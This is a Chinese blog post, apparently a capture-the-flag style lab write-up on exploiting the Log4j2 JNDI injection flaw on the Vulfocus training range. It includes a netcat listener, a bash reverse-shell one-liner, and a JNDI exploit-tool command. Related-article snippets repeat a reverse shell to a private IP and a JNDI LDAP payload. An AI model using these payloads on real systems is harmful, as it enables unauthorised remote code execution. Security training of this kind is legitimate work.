【安全攻防实验-5】Vulfocus练习-log4j2攻击

最新推荐文章于 2024-05-22 15:49:22 发布
最新推荐文章于 2024-05-22 15:49:22 发布
阅读量1.5k 收藏
点赞数
分类专栏: 内网渗透 WEB安全 文章标签: 安全 信息安全 渗透测试 log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26579613/article/details/122825346
版权

1、VPS打开监听

nc -lvvp 4444
#顺便写个payload
bash -i >& /dev/tcp/your-ip/8888 0>&1

2、payload转化

java.lang.Runtime.exec() Payload Workarounds - @Jackson_T

准备真正的payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "上面的payload" -A "your-ip"

打开JNDI-监听

 获得flag

 

 

  

BridyWang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全攻防实验-4】Vulfocus练习-log4j2攻击准备
qq_26579613的博客
02-08 1216
1、环境准备 2、工具准备 2.1安装JNDI-Injection-Exploit git clone https://github.com/welk1n/JNDI-Injection-Exploit.git 2.2 安装MVN mkdip -p /usr/local/apache-maven cd /usr/local/apache-maven wget -c https://dlcdn.apache.org/maven/maven-3/3.8.4/bin...
安全攻防实验-2】VulFocus搭建
qq_26579613的博客
02-07 1062
建议内网搭建
【送书活动第2期】打靶Portswigger系列—— 一口气通关18个SQL注入靶场详细流程(文末送书)
最新发布
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
05-22 1200
BurpSuite自带就有靶场,而BP又是全球最牛的渗透工具之一,是国外专业安全团队长期维护的项目,所以安全学院做得非常不错,里面的靶场(安全实验室Libs)包含了几乎所有常见的Web漏洞,在2024年的今天,我是十分推荐大家去使用的!!
Log4j2远程代码执行-vulfocus-wp
miojjnum的博客
12-22 275
描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 当前环境测试url:http://xxxxx/hello post参数为:payload=xxxxx 1、首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境:(
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)
yang1234567898的博客
04-18 3199
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
log4j2 JNDI注入复现
qq_20504373的博客
12-14 6444
复现现象: 这个镜像使用了log4j2用来当做靶机程序 1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09 2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名 4、执行一个post curl -X POST -F “payload=${jndi:ldap://
log4j2-rce靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
天津理工大学信息安全专业网络攻防实验3-Web攻击与防御
11-28
在本次实验中,主要目标是深入理解Web安全中的一个重要威胁——SQL注入,并掌握利用sqlmap工具进行POST注入攻击的方法。SQL注入是一种常见的黑客攻击手段,通过在Web应用的输入字段中插入恶意SQL代码,攻击者可以...
攻防实验-arp攻击.pdf
12-10
比较详细的介绍了ARP攻击的步骤,利用ARP攻击劫持流量,或者达到阻断网络的目的。
计算机安全实验2-4
06-16
华工计算机安全实验2-4代码+报告,掌握ARP欺骗攻击的原理和防范措施 熟悉使用Bettercap嗅探口令 熟悉使用msfvenom生成后门程序 掌握SQL注入攻击 • 掌握在Windows操作系统中配置防火墙 • 掌握通过UFW配置防火墙
vulfocus靶场通关(目录遍历)
信安是不可或缺的一部分!
01-31 2194
该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。受影响的版本为 8.5.14 之前的版本、8.13.6 之前的 8.6.0 版本以及 8.16.1 之前的 8.14.0 版本。uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…
Log4j拿shell(vulfocus靶场详细教程)
1
04-16 4573
直接在vulfocus起一个靶场环境 burp抓包,看到提示参数是payload dnslog验证 先来使用dnslog验证一下 ${jndi:ldap://“ip”/poc} 这里的ip是dnslog获取到的域名 生成的payload需要url编码,下面可以看到验证成功,说明存在log4j,然后我们反弹shell拿权限 反弹shell vps开启监听 nc -lvnp 2333 使用工具:https://github.com/Zard-ethan/JNDI-I.
vulfocus/log4j2-rce-2021-12-09:latest通关
qq_44122254的博客
12-28 5127
别的大佬在漏洞出来后立马复现利用都学明白了,我这个菜鸟开始了 搜到了在vulfocus.fofa.io靶场有更新了,就在这里开始了学习 启动靶场 按照官方说的漏洞位置在/hello,漏洞变量是payload 按照官方说的在hello里面访问hello 查看漏洞是否存在,当然啦,这是靶场怎么会不存在呢,哈哈哈 证明漏洞存在的方式: dnslog地址 构造payload 执行之后看一下这边的解析记录,存在此漏洞 好了,继续靶场复现 漏洞存在后,进行反弹shell,进一步利用,这里用到了一个工具**JND
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 983
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
twonkyserver 目录遍历(CVE-2018-7171)漏洞复现【VULFOCUS靶场-初级】
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-12 3394
LYNX Twonky Server是美国LYNX TECHNOLOGY公司的一款媒体服务器,支持在连接的设备之间共享媒体内容。 LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞。远程攻击者可通过向rpc/set_all发送带有‘..’序列的‘contentbase’参数利用该漏洞分享任意目录的内容。
国产开源网络安全渗透测试集成靶场vulfocus
顺其自然~专栏
10-17 1432
进入项目所在的目录的vulfocus-api文件夹目录下,执行下面命令。
vulfocus-Tomcat-pass-Getshell复测过程
小羊的博客
12-23 506
1.漏洞概述 Apache+Tomcat 是很常用的网站解决方案,Apache 用于提供 web 服务,而 Tomcat 是 Apache 服务器的扩展,用于运行 jsp 页面和 servlet。Tomcat 有一个管理后台,其用户名和密码在 Tomcat 安装目录下的 conf\tomcat-users.xml 文件中配置,不少管理员为了方便,经常采用弱口令。 Tomcat 支持在后台部署 war 包,可以直接将 webshell 部署到 web 目录下,如果 tomcat 后台管理用户...
综合开源靶场搭建
qq_53058639的博客
03-15 1223
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。安装完成以后,登入到vulfocus平台,点击镜像管理->添加->勾选sqli-labs->点击一键导入,之后我们就可以在菜单栏首页,参看到sqli-labs的靶场环境了。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
Android安全攻防指南:硬件层攻击与逆向技术详解
通过本文对硬件层攻击的案例分析和解析,读者可以更深入地了解Android系统的安全性问题,从而增强对系统安全性的认识,防范潜在的安全威胁。Android系统在嵌入式设备中的应用前景广阔,但也需要不断改进和加强安全性...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值